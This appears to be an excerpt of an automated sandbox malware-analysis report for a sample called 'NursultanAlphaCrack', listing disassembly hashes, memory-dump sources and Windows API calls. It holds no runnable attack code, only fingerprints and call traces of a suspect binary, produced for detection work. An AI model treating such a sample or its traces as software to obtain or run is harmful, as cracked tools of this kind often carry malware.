                                                                                        • API String ID:
                                                                                        • Opcode ID: 4b8ea3e71c14466ab805927a3577d58263d0c3bbff8cab986e760e11b357b310
                                                                                        • Instruction ID: 92dd55178c6bd87df9c1f32049691a9a7af250979610f09f52190dd1bb4bb6d3
                                                                                        • Opcode Fuzzy Hash: 4b8ea3e71c14466ab805927a3577d58263d0c3bbff8cab986e760e11b357b310
                                                                                        • Instruction Fuzzy Hash: D7E146755083948FC304CF29E89486BBFF1AF9A310F49495EF9C497352C235EA19DBA2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                        • Instruction ID: 305cd25f4dec1cba44536f980f9acd774eff08966d6e2adb6560fdf07e2c6040
                                                                                        • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                        • Instruction Fuzzy Hash: 139154B02003499BDB29EF68E895BBA77D5EFB0304F50092EF59687382DB74E545C352
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                        • Instruction ID: 1e0cfeaf7e3736c2ae307d49f0c0b538641dbb38fb8d627465e0c2f18bd52783
                                                                                        • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                        • Instruction Fuzzy Hash: 318148713043869BDB29DE68D8D1BBD37D4AFA1308F40092FE9868B382DB74D9858752
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 172b1cbe9c098cf0b16ebd40baca7b0105933f34a671ce3ad19f38ebdfcf2b36
                                                                                        • Instruction ID: 0a567482fddbe11ae3b722174761983ef673ae1af3161b9b2e92bff302353e5f
                                                                                        • Opcode Fuzzy Hash: 172b1cbe9c098cf0b16ebd40baca7b0105933f34a671ce3ad19f38ebdfcf2b36
                                                                                        • Instruction Fuzzy Hash: 46618735A00FCA97CB389A6B58917BE73A7FB1178CF14051AE643DF282D791DD428311
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                        • Instruction ID: f17ac741a6dd43e05ffa4d6b66efe471d21c74366ff9cb9bc6e3ff6617f29866
                                                                                        • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                        • Instruction Fuzzy Hash: 73513571600FC857DF388A6F8556BBF67D79B52B0CF180919F882CB282C715EE4583A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 38ac3674d80322d544375dacea9858a446e8aa4936f3d377684faaf0b85f20da
                                                                                        • Instruction ID: a97586ab6c18e0cab1fe10c2e0c248da5ceb2f346f85d17d409ae1efa30b374a
                                                                                        • Opcode Fuzzy Hash: 38ac3674d80322d544375dacea9858a446e8aa4936f3d377684faaf0b85f20da
                                                                                        • Instruction Fuzzy Hash: 6F51D3315083D58FC712CF24C14496EBFE2AEAA714F5949ADF4D95B243C321DA4BCB62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8190f30e3b41f1fb02e10e803696b224ce67ce3cc582d9298cf52069185058be
                                                                                        • Instruction ID: 56df6b3be24f6a877f634be832cc8ad20857fe8c2841e29483f1ff9398d8148e
                                                                                        • Opcode Fuzzy Hash: 8190f30e3b41f1fb02e10e803696b224ce67ce3cc582d9298cf52069185058be
                                                                                        • Instruction Fuzzy Hash: A451DFB1A087119FC748CF19D88065AF7E1FB88354F058A2EE899E3340D734E959CB9A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                        • Instruction ID: 437934ca8d896543f1e9c418a552b028bba45e8924a64dc581bb14217a337869
                                                                                        • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                        • Instruction Fuzzy Hash: C431F8B1A1474A8FCB18DF28C85166EBBE0FFA5304F50452EE495D7341C735EA0ACB92
                                                                                        APIs
                                                                                        • _swprintf.LIBCMT ref: 001CE30E
                                                                                          • Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5
                                                                                          • Part of subcall function 001D1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00201030,00000200,001CD928,00000000,?,00000050,00201030), ref: 001D1DC4
                                                                                        • _strlen.LIBCMT ref: 001CE32F
                                                                                        • SetDlgItemTextW.USER32(?,001FE274,?), ref: 001CE38F
                                                                                        • GetWindowRect.USER32(?,?), ref: 001CE3C9
                                                                                        • GetClientRect.USER32(?,?), ref: 001CE3D5
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 001CE475
                                                                                        • GetWindowRect.USER32(?,?), ref: 001CE4A2
                                                                                        • SetWindowTextW.USER32(?,?), ref: 001CE4DB
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 001CE4E3
                                                                                        • GetWindow.USER32(?,00000005), ref: 001CE4EE
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 001CE51B
                                                                                        • GetWindow.USER32(00000000,00000002), ref: 001CE58D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                        • String ID: I=u$$%s:$CAPTION$d
                                                                                        • API String ID: 2407758923-1991495195
                                                                                        • Opcode ID: aa4104d7f5c1a9ddb8ec5d53850e85bcd63a33e84f777988cb6fb863419caea3
                                                                                        • Instruction ID: 4de5eb54d053f908d264c8eecbc0a9d0a01d609096d695662abe42c73abd4ff9
                                                                                        • Opcode Fuzzy Hash: aa4104d7f5c1a9ddb8ec5d53850e85bcd63a33e84f777988cb6fb863419caea3
                                                                                        • Instruction Fuzzy Hash: EC81AF72208341AFD710DFA8DC89F6BBBE9EB98714F04191DFA88E7250D734E9058B52
                                                                                        APIs
                                                                                        • ___free_lconv_mon.LIBCMT ref: 001ECB66
                                                                                          • Part of subcall function 001EC701: _free.LIBCMT ref: 001EC71E
                                                                                          • Part of subcall function 001EC701: _free.LIBCMT ref: 001EC730
                                                                                          • Part of subcall function 001EC701: _free.LIBCMT ref: 001EC742
                                                                                          • Part of subcall function 001EC701: _free.LIBCMT ref: 001EC754
                                                                                          • Part of subcall function 001EC701: _free.LIBCMT ref: 001EC766
                                                                                          • Part of subcall function 001EC701: _free.LIBCMT ref: 001EC778
                                                                                          • Part of subcall function 001EC701: _free.LIBCMT ref: 001EC78A
                                                                                          • Part of subcall function 001EC701: _free.LIBCMT ref: 001EC79C
                                                                                          • Part of subcall function 001EC701: _free.LIBCMT ref: 001EC7AE
                                                                                          • Part of subcall function 001EC701: _free.LIBCMT ref: 001EC7C0
                                                                                          • Part of subcall function 001EC701: _free.LIBCMT ref: 001EC7D2
                                                                                          • Part of subcall function 001EC701: _free.LIBCMT ref: 001EC7E4
                                                                                          • Part of subcall function 001EC701: _free.LIBCMT ref: 001EC7F6
                                                                                        • _free.LIBCMT ref: 001ECB5B
                                                                                          • Part of subcall function 001E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34), ref: 001E8DE2
                                                                                          • Part of subcall function 001E8DCC: GetLastError.KERNEL32(001F3A34,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34,001F3A34), ref: 001E8DF4
                                                                                        • _free.LIBCMT ref: 001ECB7D
                                                                                        • _free.LIBCMT ref: 001ECB92
                                                                                        • _free.LIBCMT ref: 001ECB9D
                                                                                        • _free.LIBCMT ref: 001ECBBF
                                                                                        • _free.LIBCMT ref: 001ECBD2
                                                                                        • _free.LIBCMT ref: 001ECBE0
                                                                                        • _free.LIBCMT ref: 001ECBEB
                                                                                        • _free.LIBCMT ref: 001ECC23
                                                                                        • _free.LIBCMT ref: 001ECC2A
                                                                                        • _free.LIBCMT ref: 001ECC47
                                                                                        • _free.LIBCMT ref: 001ECC5F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                        • String ID:
                                                                                        • API String ID: 161543041-0
                                                                                        • Opcode ID: f0e97545c674913c62498f19dc428f28f51ca012ec83b8dc6cec02931145fffa
                                                                                        • Instruction ID: 0f5c53595d185faef3072003104be5c1a365ab0218d1aaeca4774aef882cdefb
                                                                                        • Opcode Fuzzy Hash: f0e97545c674913c62498f19dc428f28f51ca012ec83b8dc6cec02931145fffa
                                                                                        • Instruction Fuzzy Hash: 30314B31600A869FEB24AA7ADC46B5EB7E9BF20350F244429E55CD7192DF31AC81CB90
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 001D9736
                                                                                        • _wcslen.LIBCMT ref: 001D97D6
                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 001D97E5
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 001D9806
                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001D982D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                        • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                        • API String ID: 1777411235-4209811716
                                                                                        • Opcode ID: 2fd7ca8df65806e633d2b067e38436f26791490ba8d133839835bc3c19c3072d
                                                                                        • Instruction ID: 05e8ef85fd62d39ca3cb0e5f86606d585061289b780bd3c62c635cf731aa557a
                                                                                        • Opcode Fuzzy Hash: 2fd7ca8df65806e633d2b067e38436f26791490ba8d133839835bc3c19c3072d
                                                                                        • Instruction Fuzzy Hash: 6B318A321087457BE725AF35AC06F6F779CDF62720F14011FF511972D2EB649A0483A5
                                                                                        APIs
                                                                                        • GetWindow.USER32(?,00000005), ref: 001DD6C1
                                                                                        • GetClassNameW.USER32(00000000,?,00000800), ref: 001DD6ED
                                                                                          • Part of subcall function 001D1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,001CC116,00000000,.exe,?,?,00000800,?,?,?,001D8E3C), ref: 001D1FD1
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 001DD709
                                                                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 001DD720
                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 001DD734
                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 001DD75D
                                                                                        • DeleteObject.GDI32(00000000), ref: 001DD764
                                                                                        • GetWindow.USER32(00000000,00000002), ref: 001DD76D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                        • String ID: STATIC
                                                                                        • API String ID: 3820355801-1882779555
                                                                                        • Opcode ID: 8099ee8071f0a40eaaf67141bedf34313ba4543eaad72112a002240313454aac
                                                                                        • Instruction ID: f927af129984c49472b4e2f9667923cc3e74bfa0ecafcf3bdb84910c30998322
                                                                                        • Opcode Fuzzy Hash: 8099ee8071f0a40eaaf67141bedf34313ba4543eaad72112a002240313454aac
                                                                                        • Instruction Fuzzy Hash: C61103726403107BE631EBB4BC4EFAF765CAF54715F004122FA41E6291DB68CF0686B5
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 001E9705
                                                                                          • Part of subcall function 001E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34), ref: 001E8DE2
                                                                                          • Part of subcall function 001E8DCC: GetLastError.KERNEL32(001F3A34,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34,001F3A34), ref: 001E8DF4
                                                                                        • _free.LIBCMT ref: 001E9711
                                                                                        • _free.LIBCMT ref: 001E971C
                                                                                        • _free.LIBCMT ref: 001E9727
                                                                                        • _free.LIBCMT ref: 001E9732
                                                                                        • _free.LIBCMT ref: 001E973D
                                                                                        • _free.LIBCMT ref: 001E9748
                                                                                        • _free.LIBCMT ref: 001E9753
                                                                                        • _free.LIBCMT ref: 001E975E
                                                                                        • _free.LIBCMT ref: 001E976C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 24c051dfbbb22e874043866c60367f975650def6ec104c0df7e9965f994dac24
                                                                                        • Instruction ID: a3f3d2268413804d3b3a0c3aad4c62399ae89436bbf9511afab47b0cf473c68e
                                                                                        • Opcode Fuzzy Hash: 24c051dfbbb22e874043866c60367f975650def6ec104c0df7e9965f994dac24
                                                                                        • Instruction Fuzzy Hash: 3611D276100549AFCB09EF96CC82CDD3BB5FF24350B0550A1FA088F262DF32EA509B84
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                        • String ID: csm$csm$csm
                                                                                        • API String ID: 322700389-393685449
                                                                                        • Opcode ID: 1e61d5bc57a8d7ef8ff0a5d39356cadf12e013c8e9c807e0c2ab21168bf69511
                                                                                        • Instruction ID: 47ddf199ffcc3bb7c1b7cc0bed8e579484507e0159dab3ce33b1039c73057f72
                                                                                        • Opcode Fuzzy Hash: 1e61d5bc57a8d7ef8ff0a5d39356cadf12e013c8e9c807e0c2ab21168bf69511
                                                                                        • Instruction Fuzzy Hash: B1B18D71800A89EFCF29DFA6C8999AEB7B9FF14310F144159F8216B212D731EA51CF91
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 001C6FAA
                                                                                        • _wcslen.LIBCMT ref: 001C7013
                                                                                        • _wcslen.LIBCMT ref: 001C7084
                                                                                          • Part of subcall function 001C7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 001C7AAB
                                                                                          • Part of subcall function 001C7A9C: GetLastError.KERNEL32 ref: 001C7AF1
                                                                                          • Part of subcall function 001C7A9C: CloseHandle.KERNEL32(?), ref: 001C7B00
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                        • API String ID: 3122303884-3508440684
                                                                                        • Opcode ID: 0b21fc57f55e5540a774dbad9ac5e6daa9bbe742fd7a080a7c5681d326c98398
                                                                                        • Instruction ID: d7c9b6d9a8e522ce0386b380ac55d673853555ddb515d1556769fab03184c7a8
                                                                                        • Opcode Fuzzy Hash: 0b21fc57f55e5540a774dbad9ac5e6daa9bbe742fd7a080a7c5681d326c98398
                                                                                        • Instruction Fuzzy Hash: D541D7B1D087887AEB21E7709C46FEE776C6F35344F040459FA55A71C2D7B4EA448B21
                                                                                        APIs
                                                                                          • Part of subcall function 001C1316: GetDlgItem.USER32(00000000,00003021), ref: 001C135A
